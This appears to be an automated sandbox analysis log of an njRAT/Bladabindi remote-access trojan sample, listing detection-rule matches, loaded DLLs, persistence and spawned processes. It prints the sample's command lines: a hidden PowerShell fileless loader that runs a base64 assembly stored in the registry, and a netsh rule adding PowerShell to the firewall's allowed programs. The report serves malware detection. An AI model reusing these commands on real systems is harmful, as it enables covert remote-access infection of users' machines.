Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0042200C 0_2_0042200C
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041A217 0_2_0041A217
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00412216 0_2_00412216
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0042435D 0_2_0042435D
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004033C0 0_2_004033C0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004125E8 0_2_004125E8
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044663B 0_2_0044663B
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004096A0 0_2_004096A0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00413801 0_2_00413801
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0042096F 0_2_0042096F
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004129D0 0_2_004129D0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004119E3 0_2_004119E3
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041C9AE 0_2_0041C9AE
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0047EA6F 0_2_0047EA6F
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040FA10 0_2_0040FA10
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00423C81 0_2_00423C81
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00411E78 0_2_00411E78
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00442E0C 0_2_00442E0C
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00420EC0 0_2_00420EC0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044CF17 0_2_0044CF17
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00444FD2 0_2_00444FD2
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B408E2 1_2_00B408E2
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00ACE800 1_2_00ACE800
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE3307 1_2_00AE3307
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00ACE060 1_2_00ACE060
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD4140 1_2_00AD4140
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE2345 1_2_00AE2345
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B40465 1_2_00B40465
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF6452 1_2_00AF6452
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF25AE 1_2_00AF25AE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE277A 1_2_00AE277A
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD6841 1_2_00AD6841
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF69C4 1_2_00AF69C4
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B28932 1_2_00B28932
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B1E928 1_2_00B1E928
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF890F 1_2_00AF890F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD8968 1_2_00AD8968
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AECCA1 1_2_00AECCA1
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF6F36 1_2_00AF6F36
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD70FE 1_2_00AD70FE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD3190 1_2_00AD3190
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AC1287 1_2_00AC1287
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEF359 1_2_00AEF359
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD5680 1_2_00AD5680
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE1604 1_2_00AE1604
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD58C0 1_2_00AD58C0
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE7813 1_2_00AE7813
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE1AF8 1_2_00AE1AF8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEDAF5 1_2_00AEDAF5
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF9C35 1_2_00AF9C35
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B47E0D 1_2_00B47E0D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00ACFE40 1_2_00ACFE40
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEBF26 1_2_00AEBF26
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE1F10 1_2_00AE1F10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D7F836 4_2_000007FE93D7F836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D797E8 4_2_000007FE93D797E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D805E2 4_2_000007FE93D805E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D7F339 4_2_000007FE93D7F339
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D745C5 4_2_000007FE93D745C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93E41416 4_2_000007FE93E41416
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003AE800 12_2_003AE800
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_004208E2 12_2_004208E2
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C3307 12_2_003C3307
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003AE060 12_2_003AE060
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B4140 12_2_003B4140
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C2345 12_2_003C2345
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00420465 12_2_00420465
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D6452 12_2_003D6452
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D25AE 12_2_003D25AE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C277A 12_2_003C277A
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B6841 12_2_003B6841
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003FE928 12_2_003FE928
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D890F 12_2_003D890F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B8968 12_2_003B8968
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00408932 12_2_00408932
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D69C4 12_2_003D69C4
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CCCA1 12_2_003CCCA1
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D6F36 12_2_003D6F36
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B70FE 12_2_003B70FE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B3190 12_2_003B3190
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003A1287 12_2_003A1287
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CF359 12_2_003CF359
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C1604 12_2_003C1604
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B5680 12_2_003B5680
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C7813 12_2_003C7813
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B58C0 12_2_003B58C0
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C1AF8 12_2_003C1AF8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CDAF5 12_2_003CDAF5
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D9C35 12_2_003D9C35
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00427E0D 12_2_00427E0D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003AFE40 12_2_003AFE40
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CBF26 12_2_003CBF26
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C1F10 12_2_003C1F10
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 003C8A80 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 00AE0C63 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 003C0C63 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 00AC7F41 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 003A7F41 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 00AE8A80 appears 42 times
Source: C:\Users\user\Desktop\._cache_1.exe Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\._cache_1.exe Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\._cache_1.exe Code function: String function: 00445AE0 appears 65 times
Source: ._cache_1.exe, 00000000.00000003.341152495.0000000000A08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs ._cache_1.exe
Source: ._cache_1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.phis.troj.evad.winEXE@14/16@28/1
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW, 0_2_0044AF6C
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464EAE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B184F3 AdjustTokenPrivileges,CloseHandle, 1_2_00B184F3
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B18AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_00B18AA3
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003F84F3 AdjustTokenPrivileges,CloseHandle, 12_2_003F84F3
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003F8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 12_2_003F8AA3
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D619
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 0_2_004755C4
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0046E48D CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0046E48D
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043305F
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\5cd8f17f4086744065eb0992a09e05a2
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Local\Temp\aut512C.tmp
Source: ._cache_1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\._cache_1.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\._cache_1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: ._cache_1.exe ReversingLabs: Detection: 80%
Source: ._cache_1.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\._cache_1.exe File read: C:\Users\user\Desktop\._cache_1.exe
Source: unknown Process created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe"
Source: C:\Users\user\Desktop\._cache_1.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
Source: C:\Users\user\Desktop\._cache_1.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: devrtl.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: avicap32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvfw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: credui.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mpr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: odbc32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
